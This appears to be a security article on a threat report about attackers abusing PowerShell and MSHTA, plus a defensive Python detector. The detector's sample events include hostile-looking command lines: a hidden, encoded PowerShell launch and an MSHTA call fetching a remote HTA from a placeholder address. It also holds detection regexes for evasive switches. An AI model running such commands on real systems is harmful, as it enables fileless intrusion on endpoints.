According to a new threat report from security vendor eSentire, 91% of endpoint incidents involve files that anti-malware solutions will not block or remove.
The bad guys have an advantage: your endpoints run applications by design. So if they can leverage known, legitimate binaries that are part of the OS to accomplish malicious tasks, many leading anti-virus and endpoint protection solutions are helpless to stop them.
This is what eSentire found in its latest Quarterly Threat Report: applications like PowerShell and MSHTA (Microsoft’s utility for executing HTML applications) were used 91% of the time in Q1 of this year alone.
This leveraging of executables that the OS already knows is yet another example of a fileless malware attack, an evasive technique used to avoid detection by security solutions.
PowerShell in particular provides attackers with a number of “criminal-friendly” capabilities:
- It’s trusted – From an OS perspective, PowerShell is a highly reputable process. Its signature is trusted by the OS, and it is loaded directly through system memory (making it impossible to scan using heuristics). And because it’s integrated into Windows, PowerShell has unrestricted access to the operating system, making it the perfect tool for cybercriminals.
- It can run remotely – Through the use of WinRM, PowerShell remoting is easy, giving attackers the ability to run commands remotely without needing to have some kind of remote control software installed.
- It can provide total endpoint control – Remember, PowerShell was designed to bring control of the OS to the command line. So, as long as the cybercriminal is using an account with local admin rights, there isn’t much they can’t do on a compromised endpoint.
- It can access the enterprise – With the right elevated credentials, the ability to establish remote sessions on additional endpoints is built into PowerShell’s functionality, making lateral movement an easy task.
So, what should you do about it?
In the case of PowerShell and MSHTA, some endpoint detection and response (EDR) solutions perform deep analysis of processes and their actions, looking for anomalous behavior. Finding one that can analyze even OS-native processes will help.
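What that "deep analysis of processes and their actions" looks like in practice, as an added example (not eSentire's, Microsoft's or the article's own code): a small behavioural triage of process-creation telemetry that keys on who launched the script host, on PowerShell's window-hiding and policy-bypass switches, and on MSHTA pulling a remote or inline script. The event shape, rule names and sample records are all constructed for this example.

```python
"""Behavioural triage of process-creation events for PowerShell / MSHTA abuse.
Added example, not code from the article, eSentire or Microsoft; the event
shape, rule names and every sample record are constructed."""
import re
from dataclasses import dataclass
from typing import List
@dataclass
class ProcEvent:
    parent: str    # parent image name, e.g. "mshta.exe"
    image: str     # child image name
    cmdline: str   # child command line
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Document readers, mail clients and script engines rarely need to spawn a shell.
SUSPICIOUS_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}
# Switches that hide the window, skip profiles, bypass policy or take encoded
# input; PowerShell accepts unique prefixes, so the short forms are included.
EVASIVE_FLAGS = re.compile(
    r"-(?:e(?:c|nc(?:odedcommand)?)?|w(?:in(?:dowstyle)?)?\s+hidden"
    r"|nop(?:rofile)?|(?:ex(?:ec(?:utionpolicy)?)?|ep)\s+bypass)\b", re.I)
# MSHTA fetching a remote HTA or running an inline script: protocol handler.
MSHTA_REMOTE = re.compile(r"https?://|javascript:|vbscript:", re.I)
def triage(ev: ProcEvent) -> List[str]:
    """Return the names of the rules this event triggers (empty = nothing seen)."""
    findings: List[str] = []
    image, parent = ev.image.lower(), ev.parent.lower()
    if image not in SCRIPT_HOSTS:
        return findings
    if parent in SUSPICIOUS_PARENTS:
        findings.append("suspicious_parent")
    if parent == "wsmprovhost.exe":   # WinRM host process: a remoting session
        findings.append("spawned_in_remote_session")
    if image != "mshta.exe" and EVASIVE_FLAGS.search(ev.cmdline):
        findings.append("powershell_evasive_flags")
    if image == "mshta.exe" and MSHTA_REMOTE.search(ev.cmdline):
        findings.append("mshta_remote_or_inline_script")
    return findings
# Constructed telemetry: a routine admin script, then three events that match
# the tradecraft the article describes (the encoded blob is a placeholder).
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"),
    ProcEvent("winword.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc QUFBQQ=="),
    ProcEvent("outlook.exe", "mshta.exe", "mshta.exe http://203.0.113.5/invoice.hta"),
    ProcEvent("wsmprovhost.exe", "powershell.exe", "powershell.exe -c ipconfig"),
]
def run_sample() -> List[List[str]]:
    return [triage(ev) for ev in SAMPLE_EVENTS]
```

The remote-session rule is context rather than a verdict: legitimate administration also runs under wsmprovhost.exe, so it is most useful combined with the parent and flag rules or with account and time-of-day information.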
In addition, educating users to be more aware of malware, phishing attacks and how to avoid infection, through security awareness training, significantly reduces the potential that an attack, even one that leverages tools like PowerShell, ever takes hold in the first place.